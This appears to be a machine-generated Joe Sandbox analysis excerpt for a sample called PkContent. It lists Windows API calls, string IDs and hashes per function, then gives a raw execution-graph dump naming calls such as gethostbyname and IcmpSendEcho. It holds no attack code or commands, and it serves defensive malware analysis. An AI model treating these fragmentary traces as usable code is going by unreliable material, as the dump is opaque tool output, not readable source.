                                                      • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                      • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: lstrcatwsprintf
                                                      • String ID: %02x%c$...
                                                      • API String ID: 3065427908-1057055748
                                                      • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                      • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                      • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                      • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 00405057
                                                        • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                      • String ID: Section: "%s"$Skipping section: "%s"
                                                      • API String ID: 2266616436-4211696005
                                                      • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                      • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                      • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                      • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                      APIs
                                                      • GetDC.USER32(?), ref: 00402100
                                                      • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                      • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                        • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                      • String ID:
                                                      • API String ID: 1599320355-0
                                                      • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                      • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                      • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                      • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                      APIs
                                                        • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                      • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                      • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                      • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: lstrcpyn$CreateFilelstrcmp
                                                      • String ID: Version
                                                      • API String ID: 512980652-315105994
                                                      • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                      • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                      • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                      • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                      APIs
                                                      • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                      • GetTickCount.KERNEL32 ref: 00403303
                                                      • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                      • String ID:
                                                      • API String ID: 2102729457-0
                                                      • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                      • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                      • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                      • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                      • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                      • String ID:
                                                      • API String ID: 2883127279-0
                                                      • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                      • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                      • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                      • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                      APIs
                                                      • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                      • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringlstrcmp
                                                      • String ID: !N~
                                                      • API String ID: 623250636-529124213
                                                      • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                      • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                      • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                      • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                      APIs
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                      • CloseHandle.KERNEL32(?), ref: 00405C71
                                                      Strings
                                                      • Error launching installer, xrefs: 00405C48
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: Error launching installer
                                                      • API String ID: 3712363035-66219284
                                                      • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                      • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                      • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                      • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                      APIs
                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CloseHandlelstrlenwvsprintf
                                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                                      • API String ID: 3509786178-2769509956
                                                      • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                      • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                      • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                      • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                      • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                      • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                      • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                      • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                      • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                      Execution Graph

                                                      Execution Coverage:4%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:1.9%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:75
                                                       [execution_graph: raw node/edge dump of the rendered execution graph (node ids, addresses and API names), not reproduced as text]
59 API calls Mailbox 98484->98500 98485 126a9b 98768 12a9de 299 API calls 98485->98768 98488 15eff9 98788 125190 59 API calls Mailbox 98488->98788 98490 15f007 98789 18a48d 89 API calls 4 library calls 98490->98789 98494 15efeb 98540 125569 Mailbox 98494->98540 98787 176cf1 59 API calls Mailbox 98494->98787 98495 1260e5 98496 15e137 98495->98496 98503 1263bd Mailbox 98495->98503 98509 126abc 98495->98509 98514 126152 Mailbox 98495->98514 98496->98503 98769 177aad 59 API calls 98496->98769 98500->98484 98500->98485 98500->98488 98500->98490 98500->98495 98500->98509 98500->98540 98553 1253b0 98500->98553 98724 19c355 98500->98724 98767 12523c 59 API calls 98500->98767 98772 131c9c 98500->98772 98776 187f11 59 API calls Mailbox 98500->98776 98777 131a36 98500->98777 98781 176cf1 59 API calls Mailbox 98500->98781 98501 140fe6 Mailbox 59 API calls 98506 1263d1 98501->98506 98503->98501 98512 126426 98503->98512 98507 1263de 98506->98507 98506->98509 98510 126413 98507->98510 98511 15e172 98507->98511 98786 18a48d 89 API calls 4 library calls 98509->98786 98510->98512 98541 125447 Mailbox 98510->98541 98770 19c87c 85 API calls 2 library calls 98511->98770 98771 19c9c9 95 API calls Mailbox 98512->98771 98514->98494 98514->98509 98530 15e2e9 VariantClear 98514->98530 98514->98540 98581 195e1d 98514->98581 98606 19f1b2 98514->98606 98611 18413a 98514->98611 98614 18412a 98514->98614 98617 12cfd7 98514->98617 98636 19e60c 98514->98636 98639 12d679 98514->98639 98679 18d6be 98514->98679 98766 125190 59 API calls Mailbox 98514->98766 98782 177aad 59 API calls 98514->98782 98517 15e19d 98517->98517 98518 15f165 98791 18a48d 89 API calls 4 library calls 98518->98791 98519 15e691 98783 18a48d 89 API calls 4 library calls 98519->98783 98524 140fe6 59 API calls Mailbox 98524->98541 98525 15e6a0 98526 1269fa 98528 131c9c 59 API calls 98526->98528 98527 15ea9a 98533 131c9c 59 API calls 98527->98533 98528->98540 98530->98514 98531 131c9c 59 API calls 98531->98541 98533->98540 98534 
1269ff 98534->98518 98534->98519 98535 131207 59 API calls 98535->98541 98536 177aad 59 API calls 98536->98541 98537 142f70 67 API calls __cinit 98537->98541 98538 15eb67 98538->98540 98784 177aad 59 API calls 98538->98784 98541->98519 98541->98524 98541->98526 98541->98527 98541->98531 98541->98534 98541->98535 98541->98536 98541->98537 98541->98538 98541->98540 98542 15ef28 98541->98542 98544 125a1a 98541->98544 98764 127e50 299 API calls 2 library calls 98541->98764 98765 126e30 60 API calls Mailbox 98541->98765 98785 18a48d 89 API calls 4 library calls 98542->98785 98790 18a48d 89 API calls 4 library calls 98544->98790 98554 1253cf 98553->98554 98575 1253fd Mailbox 98553->98575 98555 140fe6 Mailbox 59 API calls 98554->98555 98555->98575 98556 1269fa 98557 131c9c 59 API calls 98556->98557 98577 125569 Mailbox 98557->98577 98558 177aad 59 API calls 98558->98575 98559 1269ff 98560 15f165 98559->98560 98561 15e691 98559->98561 98798 18a48d 89 API calls 4 library calls 98560->98798 98794 18a48d 89 API calls 4 library calls 98561->98794 98562 131207 59 API calls 98562->98575 98566 140fe6 59 API calls Mailbox 98566->98575 98567 15e6a0 98567->98500 98568 131c9c 59 API calls 98568->98575 98569 15ea9a 98571 131c9c 59 API calls 98569->98571 98571->98577 98573 15eb67 98573->98577 98795 177aad 59 API calls 98573->98795 98574 142f70 67 API calls __cinit 98574->98575 98575->98556 98575->98558 98575->98559 98575->98561 98575->98562 98575->98566 98575->98568 98575->98569 98575->98573 98575->98574 98575->98577 98578 15ef28 98575->98578 98580 125a1a 98575->98580 98792 127e50 299 API calls 2 library calls 98575->98792 98793 126e30 60 API calls Mailbox 98575->98793 98577->98500 98796 18a48d 89 API calls 4 library calls 98578->98796 98797 18a48d 89 API calls 4 library calls 98580->98797 98582 195e46 98581->98582 98583 195e74 WSAStartup 98582->98583 98830 12502b 98582->98830 98584 195e9d 98583->98584 98589 195e88 Mailbox 98583->98589 98799 1340cd 98584->98799 98587 195e61 
98587->98583 98591 12502b 59 API calls 98587->98591 98589->98514 98593 195e70 98591->98593 98593->98583 98595 195ebf inet_addr gethostbyname 98595->98589 98596 195edd IcmpCreateFile 98595->98596 98596->98589 98597 195f01 98596->98597 98598 140fe6 Mailbox 59 API calls 98597->98598 98599 195f1a 98598->98599 98834 13433f 98599->98834 98602 195f55 IcmpSendEcho 98604 195f6d 98602->98604 98603 195f34 IcmpSendEcho 98603->98604 98605 195fd4 IcmpCloseHandle WSACleanup 98604->98605 98605->98589 98607 124d37 84 API calls 98606->98607 98608 19f1cf 98607->98608 98842 184148 CreateToolhelp32Snapshot Process32FirstW 98608->98842 98610 19f1de 98610->98514 98959 18494a GetFileAttributesW 98611->98959 98615 18494a 3 API calls 98614->98615 98616 184131 98615->98616 98616->98514 98618 124d37 84 API calls 98617->98618 98619 12d001 98618->98619 98963 125278 98619->98963 98621 12d018 98622 12d57b 98621->98622 98623 12502b 59 API calls 98621->98623 98631 12d439 Mailbox __wsetenvp 98621->98631 98622->98514 98623->98631 98626 124f98 59 API calls 98626->98631 98628 140c65 62 API calls 98628->98631 98630 124d37 84 API calls 98630->98631 98631->98622 98631->98626 98631->98628 98631->98630 98632 131821 59 API calls 98631->98632 98635 12502b 59 API calls 98631->98635 98968 14312d 98631->98968 98978 1359d3 98631->98978 98989 135ac3 98631->98989 98993 13162d 98631->98993 98998 13153b 59 API calls 2 library calls 98631->98998 98999 124f3c 59 API calls Mailbox 98631->98999 98632->98631 98635->98631 99052 19d1c6 98636->99052 98638 19e61c 98638->98514 99162 124f98 98639->99162 98643 140fe6 Mailbox 59 API calls 98644 12d6aa 98643->98644 98647 12d6ba 98644->98647 99192 133df7 60 API calls Mailbox 98644->99192 98645 12d6df 98651 12502b 59 API calls 98645->98651 98654 12d6ec 98645->98654 98646 165068 98646->98645 99212 18fbb7 59 API calls 98646->99212 98649 124d37 84 API calls 98647->98649 98650 12d6c8 98649->98650 99193 133e47 98650->99193 98653 1650b0 98651->98653 98653->98654 98655 1650b8 98653->98655 
